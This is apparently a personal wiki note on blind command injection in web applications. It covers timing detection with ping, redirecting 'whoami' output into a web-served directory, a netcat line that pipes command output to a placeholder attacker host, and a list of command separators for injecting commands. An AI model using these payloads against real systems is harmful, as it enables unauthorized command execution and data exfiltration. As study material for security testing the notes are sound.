Content-Type: text/x-zim-wiki
Wiki-Format: zim 0.4
Creation-Date: 2020-06-04T04:31:29-04:00

====== Blind Command Injection ======
Created Thursday 04 June 2020

Blind command injection occurs when the system call that's being made does not return the response of the call to the Document Object Model (or DOM)

====== Ways to Detect Blind Command Injection ======

* **Ping!**

Yes, your friend ping can help you tell whether you have blind command injection or not.  Since the code is making a system call in some way, a ping will cause the page to continue loading until the command has completed.  So if you send a ping with 10 ICMP packets, the page should be loading for about 10 seconds.  If you send 20(!) packets, it should take about 20 seconds, and so on.

**ping -c 1000**


* **Redirection of Output**

Ping is usually enough to tell you whether you have blind command injection, but if you want to test further, you can attempt to redirect the output of a command to a file, then, using the browser, navigate to the page where the file is stored.  We all know the > Bash operator redirects output to a file or process so you could try redirecting the output of **id, whoami, netstat, ip addr** or other useful command to see if you can see the results.
 
**& whoami > whoami.txt**

**& whoami > /var/www/static/whoami.txt &** 


* **Bypassing the Blind Injection with Netcat**

In the spirit of full disclosure, there is a way to bypass the blind injection with netcat.  You are able to pipe the output of a command to a nc listener.  You could do something like **root; ls -la | nc {VPN_IP} {PORT} .** This will send the output of **ls -la**

====== way of injecting ======

	&
	&&
	|
	||

The following command separators work only on Unix-based systems:

	;
	Newline (0x0a or \n)
